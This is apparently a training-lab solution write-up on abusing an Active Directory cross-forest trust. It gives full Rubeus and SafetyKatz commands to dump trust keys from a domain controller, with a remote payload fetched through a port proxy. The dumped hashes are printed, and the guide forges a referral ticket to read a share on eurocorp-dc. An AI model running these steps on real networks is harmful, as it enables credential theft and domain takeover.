Learning Object 20
Tasks
1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest
Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩
Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩
Solutions
1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest
We need the trust key for the trust between dollarcorp and eurocrop, which can be retrieved using Mimikatz or SafetyKatz.
Start a process with DA privileges. Run the below command from an elevated command prompt:
First to all start a process as DA:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttRun the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
mimikatz(commandline) # lsadump::evasive-trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 5/19/2025 1:37:28 PM - CLEAR - 44 09 6f fc 1a 4c 7f 37 6d 28 3d dd 7c 01 38 b3 8a a3 ae 67 21 86 f7 d6 cc 64 7a 84 a4 fb ec 09 63 a5 67 d0 7d 46 ae d9 d3 01 67 9d 00 93 db e6 60 63 36 aa c1 ee 12 18 c0 22 f8 d0 79 b8 b2 c5 71 91 28 98 e2 21 36 09 f5 36 02 bf 9b 60 6e 37 95 8b 79 2c e2 a4 9a a5 55 20 a6 b9 f1 30 b7 71 cb 20 5d 60 8c b9 e8 69 2a 5e cb c3 3e 22 7b a5 e6 08 f1 df 92 d3 a3 ca e0 f5 b2 5a cb 7a ad ea 41 28 a1 ff 5b b7 d3 30 79 b9 95 a0 bb 22 a6 b7 02 f4 2d 2e de fe 7c 53 80 33 5c 81 ea 06 ba c5 7d 48 3e 54 20 87 50 27 d9 07 eb d8 0b ca a6 8b b1 43 92 ca bf 00 8f 57 4f f8 85 ae 90 ab 84 91 ca 46 53 cb 4d 17 af 41 b5 44 16 7f 35 74 4a a3 a0 8e 63 74 ed 0a 8b 4e b1 7f 2e db db 00 07 d9 51 e5 68 62 72 74 29 ad 7f cd e3 2f 73 6b 89 48
* aes256_hmac e9a951eb9284fa8fb97d517ee1aa3aa63bedb68f047bdef968fc07909e3d3473
* aes128_hmac 82479821a01655434a6b58c8a12ede0a
* rc4_hmac_nt 9efbee4d5451ee87a336fdd844841a60
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 11:05:00 PM - CLEAR - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
* aes256_hmac 1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
* aes128_hmac ceb4bb60cc4546c039ca70454cf27321
* rc4_hmac_nt 9e01158873ab48589848840d3b4f5ba3
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 4/18/2025 9:04:35 PM - CLEAR - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
* aes256_hmac 6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
* aes128_hmac 7217c5114ba08994c10edf30106e5ce8
* rc4_hmac_nt 5f8e757822d6f6f2977af2dc94135713
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 11:05:00 PM - CLEAR - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
* aes256_hmac 8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
* aes128_hmac f97130aff8d849fa56b61a80d77492b0
* rc4_hmac_nt e1ff686c5ac2880aaecb34a8c8db19ee
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:10:07 PM - CLEAR - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
* aes256_hmac 0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
* aes128_hmac 1f367d7f4a602f7db49b28e8954e38b3
* rc4_hmac_nt 10abed140ecd1d7926fd8ed52141a4a9
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:10:07 PM - CLEAR - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
* aes256_hmac 677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
* aes128_hmac 54713b68042823a0d642e3c8b55f2bf3
* rc4_hmac_nt 10abed140ecd1d7926fd8ed52141a4a9
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:57 PM - CLEAR - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
* aes256_hmac d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
* aes128_hmac 99e79607dc6c200854a32f6421f80e6c
* rc4_hmac_nt f3f9994ce98686f98d1dd8b81ec8f2cc
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:57 PM - CLEAR - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
* aes256_hmac 391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
* aes128_hmac d39fd719f0a4e95b7b2a5c39d1c7feb2
* rc4_hmac_nt f3f9994ce98686f98d1dd8b81ec8f2cc
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
* aes128_hmac e0923c5d48609d5521de83fc02ec3e4b
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
* aes128_hmac 65770a68dff396a49468fe35cbc98cbe
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/16/2025 9:04:55 PM - CLEAR - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
* aes256_hmac 3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
* aes128_hmac 0c32942d43e18125da040ada11ee8d5e
* rc4_hmac_nt 4e8f18911392c26d05bc7044914a6d57
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 5/16/2025 9:04:55 PM - CLEAR - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
* aes256_hmac 7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
* aes128_hmac aaaba3a50e251cbafda5bf205e9dd7ec
* rc4_hmac_nt 4e8f18911392c26d05bc7044914a6d57
mimikatz(commandline) # exit
Bye!Let’s Forge a referral ticket.
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 5/18/2025 10:03:52 PM - CLEAR - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
* aes256_hmac b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
* aes128_hmac e0923c5d48609d5521de83fc02ec3e4b
* rc4_hmac_nt 348f49cf83691a35ea71980994f02170Note that we are not injecting any SID History here as it would be filtered out. Run the below command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:348f49cf83691a35ea71980994f02170 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
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 the base64 encoded ticket from above and use it in the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJQEggSQ4QjUtbjC+gqIJbxbmO/BVEPMq5XbSWgLgkzDExG39gcNGB9k1qDWxfKTzXsDojjlDr4K45eKvRiYBbZHHptmTOMc/cwQxdBGPqD4Zl7/4Uc0HgPUHjWRvAFBefRSrWGwYqgJcWfLS9oHSFONNWw8lWlV9gio2rf1xb9Vdxo+N/7XtHUU0eYN/bg7P/23tvTnD9MebLf55qQ92uiqCjwvQnO2Kiw6Oq10uOG2L6csVHHIfuIzpbdmAxvNmFA/+7jD7f130YyPaQbuFLe7j/zSQu3hNusEAGn+QguivEe1+Z3jt5p587xLJu9dGCfOkFwLsgKUMYoP8JK3Qho3GrUWKsseVyMnk3mCobbAqPFZpanjiHCBOpa+mJP0rzE0tPc3jx6YPT9ZnVKX5sl7uIPcXWgIQiT/RvxXaHsh5cEr4aT4kqDGtOfZdNAHKCLZ7RGw6mXh6MeXYpSlIB70l9EwRiLMM9D0s/igxvgdC2kI0NuJKbc8yd4+51BAEcH7t7pVNacMCKYNjadsMTyOvnCxU3trsMY+JhXZ2yf0AZORb3Th5BK+MzRfJRij5OtFMsUmy1eCNbiJ35PulMonPYTsJBYAnJ4vhwxiTnVqNonII3+FWy06gPZ6X1Hrdb4SGeBkRrJAMMMxGJf7MAahZ5xZcEvofngAMrXClluJKSkF/Ut+0u2bn4zwytcBDAOq5luMFb3uQe9KIbqXw+pbtCZUhQW0P1NokQEG16QWHcx695kUbLsRTYGlTxGhEWiAQVR1LJLTnjsZTffd5P3jaIE4bNNBWtnJHFKE4Scpo9kk7DZyVo0HoAZ1srZ473QvVh8/+4y4Q6tMNLugA81ULZhVZZqegdeo/SkFx/A964AHCWBj22hTmGQ1nQ1DwqCcM6eE85sLFYkg3a0BIIL+1JO9XWjTbvabWBVXJBAaK3SOTQU/Z1Spe9Fbp6iJl9Nx9jK2swg8/H0Duah7nKBOKrIWjbINBCOZlarJpoW44KFvHOE9JspNtwE09JS2gTtQBxJbjMNIfTl106p20tAYk4pG8pjb1T01ECq92qTyWPg3uVjDKWA5vcgLNxk9VKVHbnKpb84olGnDZNFKOWuAyzKs2YEySVp2ItvY4vdD79/e6d+grEME48vB4jwakQEG8BxHuZSqYcT3oZ70rzTVg5D0kq7qI/Yj/OPSPGbH7RmQVx04PwjXgCPgEPHjKxb2UPXtIhdjy21tqD7BL7snXXlzaM/cErEmhH21ZYvQRyXXz2fd6I/X05YZlkM4XoVfMKCBsHacg8m0ilGyLw48i+4RxdC9T58VYdAdJo/qZRqe5ynq2K2zzXjyWfU+NYokOobgqzwTRpiXKngPp017lcJA1b+JGkG3HImTg+l/EhDrdRNaTXmTbGF8WCE55S1Og7uNJ6BzHERRZQPJvoK/JG2FVGGi9lA7YzlgcUMfWTRhyinqUpcTE+bCLt8OfHgFhj9grLVTF5N2NNL1T3XxHRyabq72LL8HQVCE7phzGl3rYqGRJgeV4vcl0Mgy9G846Nxo08JfoN+x3+XhrKaweZMoM6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBAhgr+5T4BzgkqMZmt9+refoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI1MDUxOTIxMjQzN1qlERgPMjAyNTA1MTkyMTI0MzdaphEYDzIwMjUwNTIwMDcyNDM3WqcRGA8yMDI1MDUyNjIxMjQzN1qoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.
type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
Note that the only way to enumerate accessible resources (service on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.
Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩
Based on the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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
cifs is the service for which a TGS is requested from eurocorp-dc.
Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩
type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!